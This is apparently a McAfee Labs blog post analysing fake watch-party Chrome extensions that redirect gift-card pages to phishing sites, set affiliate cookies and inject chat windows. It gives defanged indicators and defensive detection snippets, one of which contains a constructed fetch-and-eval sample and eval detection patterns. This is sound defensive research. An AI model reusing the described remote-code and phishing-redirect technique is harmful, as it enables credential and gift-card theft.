Tuesday, May 24, 2022

Imposter Netflix Chrome Extension Dupes 100k Customers

Authored by Oliver Devane, Vallabh Chole, and Aayush Tyagi 

McAfee has recently observed several malicious Chrome extensions which, once installed, redirect users to phishing sites, insert affiliate IDs and modify legitimate websites to exfiltrate personally identifiable information (PII). According to the Google Chrome Extension Store, the combined install base is 100,000.

McAfee Labs has observed that these extensions are prevalent in the USA, Europe and India, as can be seen in the heatmap below.

The perpetrator targets over 1,400 domains, 100 of which belong to the top 10,000 of the Alexa ranking, including hbomax.com, resorts.com and expedia.com.

One extension, 'Netflix Party', mimics the original Netflix Party extension, which allows groups of people to watch Netflix shows at the same time. However, this version monitors all the websites you visit and performs several malicious activities.

The malicious actor behind the extensions has created several Twitter accounts and fake review websites to deceive users into trusting and installing the extensions.

The victim is tricked into installing the extension, and their data is stolen when they browse a gift card site.

The details of each step are as follows:

  1. The perpetrator creates malicious extensions and adds them to the Chrome Extension Store. They create fake websites to review the extensions and fake Twitter accounts to publicize them.
  2. A victim may perform a web or Twitter search for Netflix Party, read the review and click on a link that leads them to the Google Chrome Store.
  3. They click to install the extension and accept the permissions.
  4. The victim will either perform a web search or navigate directly to the gift card website. The extension will identify the website and redirect them to the phishing page.
  5. The victim will enter their gift card information on the phishing page.
  6. The gift card information is posted to the server to which the malicious actor has access. They can now use or sell the stolen data and the victim will lose their funds.

Technical Analysis

This section contains the technical analysis of the malicious Chrome extension "bncibciebfeopcomdaknelhcohiidaoe".


The manifest.json file contains the permissions of the extension. The 'unsafe-eval' permission in the 'content_security_policy' and the allowed use of content.js on any website visited by the user are of particular concern.
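
A check for the two manifest traits named above, as an added example that is not McAfee's code or the extension's own file. The function name, rule names and the sample manifest are assumptions constructed for illustration.

```javascript
// Added example: flag 'unsafe-eval' in the CSP and content scripts that are
// allowed to run on every site, given a parsed manifest.json object.
const BROAD_MATCHES = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

function cspStrings(manifest) {
  const csp = manifest.content_security_policy;
  if (!csp) return [];
  // Manifest V2 uses one string; Manifest V3 uses an object of named policies.
  return typeof csp === 'string' ? [csp] : Object.values(csp);
}

function auditManifest(manifest) {
  const findings = [];
  for (const policy of cspStrings(manifest)) {
    for (const directive of policy.split(';')) {
      const [name, ...sources] = directive.trim().split(/\s+/);
      if (sources.includes("'unsafe-eval'")) {
        findings.push({ rule: 'csp-unsafe-eval', detail: name });
      }
    }
  }
  for (const cs of manifest.content_scripts || []) {
    const broad = (cs.matches || []).filter((m) => BROAD_MATCHES.has(m));
    if (broad.length > 0) {
      findings.push({ rule: 'content-script-all-sites', detail: (cs.js || []).join(',') });
    }
  }
  return findings;
}

// Constructed sample manifest (hypothetical, not the real extension's file).
const sampleManifest = {
  manifest_version: 2,
  name: 'constructed-sample',
  content_security_policy: "script-src 'self' 'unsafe-eval'; object-src 'self'",
  background: { scripts: ['background.js'] },
  content_scripts: [{ matches: ['<all_urls>'], js: ['content.js'] }],
};

console.log(auditManifest(sampleManifest));
```

Either finding alone is common in legitimate extensions; the combination means code evaluated at runtime can act on every page the user opens.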


When the extension is installed, the background.js script is loaded. This file uses a simple obfuscation technique of putting all the code on one line, which makes it difficult to read. This is easily cleaned up by using a code beautifier; the image below shows the obfuscated script on the first line and the cleaned-up code below the red arrow.

This script accesses https://accessdashboard[.]stay to download a script and store it as the variable 'code' in Chrome's local storage. This stored variable is then referenced in the content.js script, which is executed on every visited website.

Content.js

After beautification, we see that the code reads the malicious script from the 'code' variable which was previously stored.
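
A triage heuristic for the pattern described above, where one script fills a storage key from the network and another script executes the stored value. This is an added example, not McAfee's tooling; the regular expressions, function names and the one-line sample sources are constructed assumptions.

```javascript
// Added example: correlate a chrome.storage.local key written by a script
// that makes network requests with a script that reads that key and also
// uses dynamic code execution.
const SET_KEY = /chrome\.storage\.local\.set\(\s*\{\s*['"]?(\w+)['"]?\s*:/g;
const GET_KEY = /chrome\.storage\.local\.get\(\s*\[?\s*['"](\w+)['"]/g;
const NETWORK = /\bfetch\s*\(|\bXMLHttpRequest\b/;
const DYNAMIC_EXEC = /\beval\s*\(|\bnew\s+Function\s*\(/;

function keysMatched(source, regex) {
  return [...source.matchAll(regex)].map((m) => m[1]);
}

// files: { "<file name>": "<source text>" } from an unpacked extension.
function findStoredCodeExecution(files) {
  const writers = [];
  const readers = [];
  for (const [file, source] of Object.entries(files)) {
    if (NETWORK.test(source)) {
      for (const key of keysMatched(source, SET_KEY)) writers.push({ file, key });
    }
    if (DYNAMIC_EXEC.test(source)) {
      for (const key of keysMatched(source, GET_KEY)) readers.push({ file, key });
    }
  }
  const hits = [];
  for (const w of writers) {
    for (const r of readers) {
      if (w.key === r.key) hits.push({ key: w.key, writer: w.file, reader: r.file });
    }
  }
  return hits;
}

// Constructed one-line sources reproducing only the shape described above.
const sampleFiles = {
  'background.js':
    "fetch('https://example.invalid/x').then(r=>r.text()).then(t=>chrome.storage.local.set({code:t}));",
  'content.js': "chrome.storage.local.get('code',d=>{eval(d.code)});",
  'options.js': "chrome.storage.local.get('theme',d=>{document.body.className=d.theme});",
};

console.log(findStoredCodeExecution(sampleFiles));
```

Pattern matching on source text misses aliased or encoded calls, so a hit is a reason to review the extension by hand and a miss is not a clean bill of health.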


The malicious code has three main functions: redirection for phishing, modifying cookies to add affiliate IDs, and modifying website code to add chat windows.

Redirection for Phishing 

Redirection for phishing works by checking whether the URL being accessed matches a list, and conditionally redirecting to a malicious IP that hosts the phishing site.

URLs monitored are: 

  • https[:]//www.goal.com/visitor/gift-card-balance 
  • https[:]//www.macys.com/account/giftcardbalance 
  • https[:]//www.nike.com/orders/gift-card-lookup 
  • https[:]//www.nordstrom.com/nordstrom-gift-cards 
  • https[:]//www.sephora.com/magnificence/giftcards 
  • https[:]//www.sephoragiftcardbalance.com 
  • https[:]//stability.amexgiftcard.com 
  • https[:]//prepaidbalance.americanexpress.com/GPTHBIWeb/validateIPAction.do?clientkey=retailpercent20salespercent20channel 
  • https[:]//amexprepaidcard.com 
  • [:]//secure4.retailer.apple.com/store/giftcard/stability 

Upon navigating to one of the above sites, the user is redirected to 164[.]90[.]144[.]88. An observant user would notice that the URL has changed to an IP address, but some users may not.
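
The redirect leaves a recognisable sequence in proxy or browser-history data: a watched gift card page followed shortly by a request to a bare IP address. The following is an added example, not McAfee's detection logic; the event format, the five-second window, the client names and the sample events (which use documentation-range IP addresses) are assumptions.

```javascript
// Added example: find a visit to a watched gift card page that is followed,
// for the same client, by a request to a bare IPv4 host within a time window.
const WATCHED = [ // two of the monitored URLs listed above; extend as needed
  'www.macys.com/account/giftcardbalance',
  'www.nike.com/orders/gift-card-lookup',
];
const IPV4_HOST = /^(\d{1,3}\.){3}\d{1,3}$/;

function isWatched(url) {
  const u = new URL(url);
  return WATCHED.some((w) => (u.hostname + u.pathname).startsWith(w));
}

// events: [{ ts: epoch ms, client, url }] sorted by ts, e.g. from proxy logs.
function findIpRedirects(events, windowMs = 5000) {
  const lastWatched = new Map(); // client -> most recent watched-page event
  const alerts = [];
  for (const ev of events) {
    if (isWatched(ev.url)) {
      lastWatched.set(ev.client, ev);
      continue;
    }
    const prev = lastWatched.get(ev.client);
    const host = new URL(ev.url).hostname;
    if (prev && ev.ts - prev.ts <= windowMs && IPV4_HOST.test(host)) {
      alerts.push({ client: ev.client, from: prev.url, toHost: host });
      lastWatched.delete(ev.client);
    }
  }
  return alerts;
}

// Constructed events; 203.0.113.0/24 and 192.0.2.0/24 are documentation ranges.
const sampleEvents = [
  { ts: 1000, client: 'pc-17', url: 'https://www.nike.com/orders/gift-card-lookup' },
  { ts: 1400, client: 'pc-17', url: 'http://203.0.113.88/' },
  { ts: 2000, client: 'pc-22', url: 'https://www.macys.com/account/giftcardbalance' },
  { ts: 2300, client: 'pc-22', url: 'https://www.macys.com/static/app.css' },
  { ts: 9000, client: 'pc-22', url: 'http://192.0.2.10/' },
];

console.log(findIpRedirects(sampleEvents));
```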

The image below shows the Apple phishing site and the various phishing kits being hosted on this server.

The phishing sites share similar code. If a user enters their gift card information, the data will be posted to A network capture of the POST request is shown below:

Modifying of cookies to add AffiliateIDs 

The second malicious function contains AIPStore, a dictionary containing a list of URLs and their respective monetizing sites, which provide affiliate IDs. This function works by loading new tabs, which results in cookies being set on the visited sites. The flow below describes how the extension works.

  1. A user navigates to a retail website.
  2. If the retail website is contained in the AIPStore keymap, the extension loads a new tab with a link to a monetizing site which sets the cookie with the affiliate ID. The new tab is then closed, and the cookie persists.
  3. The user is unaware that a cookie has been set and continues to browse the website.
  4. Upon the purchase of any goods, the affiliate ID is recognized by the site vendor and commission is sent to the affiliate ID owner, which would be the malicious actor.

The left image below shows the original site with no affiliate cookie; the one on the right highlights the cookie that has been added by the extension.

Chat Windows 

The final function checks a list of URLs being accessed and, if they match, a JS script is injected into the HTML code, which results in a chat window being displayed. The image below shows the injected script and the chat window.

The chat window may be used by the malicious actor to request PII data, credit card, and product key information.


This threat is a good example of the lengths malicious actors will go to in order to trick users into installing malware, such as creating Twitter accounts and fake review websites.

McAfee advises its customers to be cautious when installing Chrome extensions and to pay attention to the permissions that they are requesting.

The permissions are shown by Chrome before the installation of the extension. Customers should take extra steps to verify the authenticity if the extension is requesting permissions that enable it to run on every website you visit, such as the one detailed in this blog.

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor, as shown below.

The malicious code within the extension is detected as Phish-Extension. Please perform a 'Full' scan via the product.

| Type | Value | Product | Detected |
|---|---|---|---|
| URL – Phishing Websites* | | McAfee WebAdvisor | Blocked |
| Chrome Extension | netflix-party – bncibciebfeopcomdaknelhcohiidaoe | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | teleparty – flddpiffdlibegmclipfcnmaibecaobi | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | hbo-max-watch-party – dkdjiiihnadmgmmfobidmmegidmmjobi | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | prime-watch-party – hhllgokdpekfchhhiknedpppjhgicfgg | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | private-watch-party – maolinhbkonpckjldhnocgilkabpfodc | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | hotstar-ad-blocker – hacogolfhplehfdeknkjnlblnghglfbp | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | hbo-ad-blocker – cbchmocclikhalhkckeiofpboloaakim | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | blocksite – pfhjfcifolioiddfgicgkapbkfndaodc | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | hbo-enhanced – pkdpclgpnnfhpapcnffgjbplfbmoejbj | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | hulu-watch-party – hkanhigmilpgifamljmnfppnllckkpda | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | disney-plus-watch-party – flapondhpgmggemifmemcmicjodpmkjb | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | spotify-ad-blocker – jgofflaejgklikbnoefbfmhfohlnockd | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | ott-party – lldibibpehfomjljogedjhaldedlmfck | Total Protection and LiveSafe | Phish-Extension |




